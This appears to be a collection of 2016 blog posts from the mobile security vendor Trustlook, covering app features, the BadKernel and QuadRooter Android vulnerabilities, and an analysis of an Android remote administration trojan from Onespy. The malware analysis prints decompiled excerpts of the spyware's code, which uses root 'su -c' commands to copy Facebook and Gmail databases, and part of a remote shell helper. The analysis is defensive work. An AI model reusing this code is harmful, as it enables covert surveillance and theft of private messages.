Trustlook Mobile Security Releases Instant Protection Feature

Trustlook has released a new feature in its Trustlook Mobile Security app that proactively notifies users of any new malware on their device. Instead of a user needing to re-scan their device in order to find malware, Trustlook will send a message to users if it discovers malware that was previously unknown.

For example:

  1. Jack installs a new app
  2. The Trustlook Mobile Security protection is triggered, and the app is uploaded to Trustlook’s cloud. But in some small instances Trustlook’s system has no prior knowledge of the app, so we consider it benign.
  3. A few days later, Trustlook’s Core Security system detects this new app as a malware
  4. Trustlook Operations launches “Instant Protection” to notify Jack of this malware and to uninstall the app.

In a perfect world, mobile devices would be 100% protected from security risks because security vendors would be aware of every malicious application that exists. However, that is not reality.  It’s not possible to have full, 100% coverage. So to mitigate this security risks, Trustlook now offers Instant Protection.

Oops! BadKernel Now Affects 100 Million, Not 30 Million

We reported last week that BadKernel, a flaw in the Google Chromium mobile browser framework that spreads as users click on malicious links, affects 30 million Android users. However, from our internal reporting over the past few days, it’s clear that the actual number is much higher. Our new estimate is that BadKernel now impacts 100 million Android users. This is about 7% of the total Android user base.

Trustlook has released a new feature in its Trustlook Mobile Security  app that detects BadKernel. You are encouraged to scan your phone today and see if you are impacted.

Trustlook Releases BadKernel Vulnerability Detector

An Updated Version (Version 3.5.10) of the Trustlook Mobile Security App Identifies the BadKernel Issue Affecting 30 Million Android Users

Trustlook has released a new feature in its Trustlook Mobile Security app that detects BadKernel, the widespread vulnerability affecting millions of Android devices.

First discovered in August 2016, BadKernel is a flaw in the Google Chromium mobile browser framework that spreads as users click on malicious links. Users of older versions of Chromium-powered mobile browsers, as well as applications with embedded Webview (such as the massively popular WeChat app) may be vulnerable. If infected, a user’s contacts and text messages could be exposed, as well as any payment passwords.

To determine if your device is vulnerable to this threat, open the Trustlook Mobile Security app, navigate to the BadKernel Vulnerability detector on the main screen, and click “Check it Now.” If you are exposed, you can update your browser software.

Screenshot_2016-08-26-11-50-26         Screenshot_2016-08-26-11-50-33
The BadKernel vulnerability impacts an estimated 30 million Android smartphones and tablets. The flaw involves a bug in the source code of Google’s V8 JavaScript Engine, which is a component of the open-source Chromium. An attacker can exploit this flaw to cause key object information leakage.

Since many phones are not using the most current browser software, this zero-day attack could be used widely. Trustlook encourages users to run a quick scan of their phone and update their browser if they are affected. In addition, Trustlook suggests users not click on random links or links that appear suspicious. They also stress users keep their apps and OS updated, and continually monitor their device for any potential issues.

To check if your Android device is affected by the BadKernel vulnerability, please download the Trustlook Mobile Security app.

Trustlook Discovers a Remote Administration Tool (RAT) Android Malware

High Risk Malware by Onespy collects data from popular apps

The malicious app was detected by Trustlook as “Android.Trojan.Pathcall”, with a severity rating of  8/10 (High Risk). It disguises itself as a “System Settings” app to avoid being removed. The app starts as a service and is invisible to the user.

The package can be identified as having the following characteristics:

  • MD5: 28de4b4d2e964ad25403e9c2133b2939
  • SHA256: 6f86bb869c865910c44a2b033c547a7a8b220ae3c48cd5948e74b32df286dbbc
  • Size: 184036 bytes
  • App name: Settings
  • Package name: com.path.call

The package icon is:

image00

Upon execution, the app persuades the user to grant device administrator access in order to maintain the persistence on the system:

 

image02


The app runs itself as a service in the background:

 

image01


From the screenshot below, the second “Settings” is cleverly disguised as the Remote Administration Tool (RAT) app:

 

image04


The app is developed by “www.onespy.in” and signed with the following certificate:

 

image03


Apparently the app is signed by the Android Debug Certificate. The website claims the app is “undeletable” even after a factory data reset. However, it can be removed if the user knows how to terminate the service.

The website provides a remote access panel. Depending on the packages one chooses, the registered user can perform different functions and retrieve data from many popular apps. Data such as:

  • Call Logs
  • Call Recordings
  • Applications
  • Contacts
  • SMS Messages
  • Photos
  • Surroundings
  • GPS Locations
  • Facebook Chat
  • Hike Chat
  • IMO Chat
  • Line Chat
  • Skype Call Logs
  • Skype Chat
  • Viber Call Logs
  • Viber Chat
  • WhatsApp Call Logs
  • WhatsApp Chat
  • Gmail Emails
  • Outlook Emails
  • Yahoo Emails
  • Photo Capture
  • Screenshots


In addition to the above data, the app contains code to retrieve data from Twitter, Facebook, and Gmail. For example, the following code snippets are used to retrieve Facebook chat data:

public class FBDBSender

{

 private static boolean copyDB(String paramString1, String paramString2)

 {

   try

   {

     L.l(“fb copy:” + paramString1 + “;” + paramString2);

     paramString1 = “cp ” + paramString1 + ” ” + paramString2;

     int i = Runtime.getRuntime().exec(new String[] { “su”, “-c”, paramString1 }).waitFor();

     return i == 0;

   }

   catch (Exception paramString1)

   {

     L.l(paramString1);

   }

   return false;

 }

 

 private static String getName(String paramString)

 {

   try

   {

     paramString = new JSONObject(paramString).getString(“name”);

     return paramString;

   }

   catch (Exception paramString) {}

   return “”;

 }

[…]

 private static void sendThreadsTable(Context paramContext)

 {

   if (Environment.getExternalStorageState().equals(“mounted”)) {

     localObject = Environment.getExternalStorageDirectory().getAbsolutePath();

   }

   for (;;)

   {

     str = localObject + “/fbdb2.db”;

     if (Environment.getExternalStorageState().equals(“mounted”))

     {

       localObject = Environment.getExternalStorageDirectory().getAbsolutePath();

       localObject = localObject + “/fb_chat.csv”;

     }

     for (;;)

     {

       try

       {

         if (copyDB(“/data/data/com.facebook.katana/databases/threads_db2”, str))

         {

           L.l(“fbdb copied”);

           localSQLiteDatabase = SQLiteDatabase.openDatabase(str, null, 1);

           localCursor = localSQLiteDatabase.rawQuery(“SELECT sender, text, timestamp_ms FROM messages”, null);

    […]


The following code snippets are used to get Gmail data:

public class GMailAppDBReader

{

 private static final String dbnamePrefix = “gmldbcp_”;

 

 private static String[] copyDB(Context paramContext)

 {

   Object localObject3;

   int i;

   int j;

   OutputStream localOutputStream;

   try

   {

     localObject1 = Runtime.getRuntime().exec(new String[] { “su”, “-c”, “find / -name mailstore*@gmail.com.db” }).getInputStream();

     Object localObject2 = new byte[660];

     localObject3 = new StringBuffer();

     for (;;)

     {

       i = ((InputStream)localObject1).read((byte[])localObject2);

       if (i == -1)

       {

         localObject2 = ((StringBuffer)localObject3).toString().split(“n”);

         localObject3 = new String[localObject2.length];

         j = 0;

         Process localProcess = Runtime.getRuntime().exec(“su”);

         localOutputStream = localProcess.getOutputStream();

         int k = localObject2.length;

         i = 0;

         if (i < k) {

           break;

         }

        […]

   String str = ((String)localObject1).substring(((String)localObject1).lastIndexOf(‘/’) + 1, ((String)localObject1).lastIndexOf(‘@’));

   StringBuilder localStringBuilder = new StringBuilder(“cp “).append((String)localObject1).append(” “);

   if (Environment.getExternalStorageState().equals(“mounted”)) {}

   for (Object localObject1 = Environment.getExternalStorageDirectory().getAbsolutePath();; localObject1 = paramContext.getFilesDir().getAbsolutePath())

   {

     localOutputStream.write(((String)localObject1 + “/” + “gmldbcp_” + str + “.dbn”).getBytes());

     localObject3[j] = str;

     j += 1;

     i += 1;

     break;

   }

 }

      […]


One special feature that the app provides is the ability to run a remote command shell, which gives the controller access to the linux system in an android device:

public class ExecShell {

   public enum SHELL_CMD {

       public static final enum SHELL_CMD check_su_binary;

 

       static {

           SHELL_CMD.check_su_binary = new SHELL_CMD(“check_su_binary”, 0, new String[]{“/system/xbin/which”,

                   “su”});

           SHELL_CMD.ENUM$VALUES = new SHELL_CMD[]{SHELL_CMD.check_su_binary};

       }

 

       private SHELL_CMD(String arg1, int arg2, String[] command) {

           super(arg1, arg2);

           this.command = command;

       }

 

       public static SHELL_CMD valueOf(String arg1) {

           return Enum.valueOf(SHELL_CMD.class, arg1);

       }

 

       public static SHELL_CMD[] values() {

           SHELL_CMD[] v0 = SHELL_CMD.ENUM$VALUES;

           int v1 = v0.length;

           SHELL_CMD[] v2 = new SHELL_CMD[v1];

           System.arraycopy(v0, 0, v2, 0, v1);

           return v2;

       }

   }


Summary
The Remote Administration Tool by Onespy is very dangerous malware targeting Android devices. It exhibits backdoor functionality as well as the ability to collect data. The app can be used as a monitoring tool, as well as misused as a powerful remote control tool by criminals and malicious hackers.

Trustlook Updates Qualcomm QuadRooter Scanner Android App

Trustlook has updated its popular Qualcomm QuadRooter Scanner App in an attempt to improve the app’s stability. QuadRooter is a set of four vulnerabilities (CVE-2016-2059, CVE-2016-2503, CVE-2016-2504, CVE-2016-5340, CVE-2016-2060) affecting an estimated 900 million Android smartphones and tablets built using Qualcomm chipsets. The key updates to the app are as follows:

1. Improved descriptions for QuadRooter-related vulnerabilities

2. Added more information on “What is QuadRooter?” and “How can I stay safe?”

3. Added details on each CVE (Common Vulnerabilities and Exposures) type related to QuadRooter

4. Updated design

5. Improved stability

Please visit the Google Play store to update to the latest version of the QuadRooter detection app.

Screenshot_2016-08-11-16-59-55

Top 5 Ways to Protect Yourself Against Qualcomm’s QuadRooter Vulnerability

QuadRooter is a set of four vulnerabilities (CVE-2016-2059, CVE-2016-2503, CVE-2016-2504, CVE-2016-5340, CVE-2016-2060) affecting Android devices built using Qualcomm chipsets. It is estimated that a staggering 900 million Android smartphones and tablets could be affected. Here are 5 ways to protect yourself against this vulnerability.

1. The most important thing you can do is avoid the problem in the first place. Only download apps from known sources. In your Android device’s security settings, make sure you have unchecked “Unknown sources.” This way you will be alerted if you attempt to install an app from a potentially unsafe source.

Screenshot_2016-08-10-16-44-51

2. Scan your Android mobile phone with the free Qualcomm QuadRooter Scanner app available from the Google Play store. The app is small (less than 2mb) and takes only a few seconds to run. In addition to the four QuadRooter vulnerabilities, this app also detects the Qualcomm Tether Controller Vulnerability (CVE-2016-2060).

Screenshot_2016-08-10-16-50-44

 

3. Visit your phone manufacturer’s website for any available security patches, especially if you have one of the following highly-vulnerable devices:

  • Google Nexus 5X, Nexus 6 and Nexus 6P
  • HTC One, HTC M9 and HTC 10
  • BlackBerry Priv
  • LG G4, LG G5, and LG V10
  • New Moto X by Motorola
  • OnePlus One, OnePlus 2 and OnePlus 3
  • Samsung Galaxy S7 and Samsung S7 Edge
  • Sony Xperia Z Ultra
  • Blackphone 1 and Blackphone 2

4. Make sure your Android device is running the most up-to-date operating system. That would be either 5.1.1 (Lollipop) or 6.0.1 (Marshmallow) depending on your device.

Screenshot_2016-08-10-17-16-20 (1)

5. Always have a mobile antivirus app installed on your Android device. Trustlook Antivirus and Mobile Security can be download for free from the Google Play store.

Screenshot_2016-08-10-17-18-05 (1)

Trustlook App Detects Qualcomm QuadRooter Vulnerability

Trustlook released a free Qualcomm QuadRooter Scanner application (available on Google Play) that enables Android phone owners to check if they are exposed to QuadRooter, the widespread vulnerability affecting millions of Android devices. If their device is exposed, the user may be able to download a software update from the device manufacturer that contains a security patch.

First detailed by security researchers at Check Point at DEFCON 24 in August 2016, QuadRooter is a set of four vulnerabilities affecting Android devices built using Qualcomm chipsets. In total, Check Point estimates that 900 million Android smartphones and tablets could be affected.

If any one of the four vulnerabilities is exploited, third party apps could gain special system privileges, or access to a user’s SMS database or phone history, without a user’s knowledge. Access could also provide an attacker with capabilities such as keylogging, GPS tracking, and recording video and audio.

Trustlook is working on providing detection against any additional Qualcomm vulnerabilities that may occur. Any user with a Qualcomm powered mobile device or tablet is encouraged to continually monitor their device.

Download the free QuadRooter Scanner app here.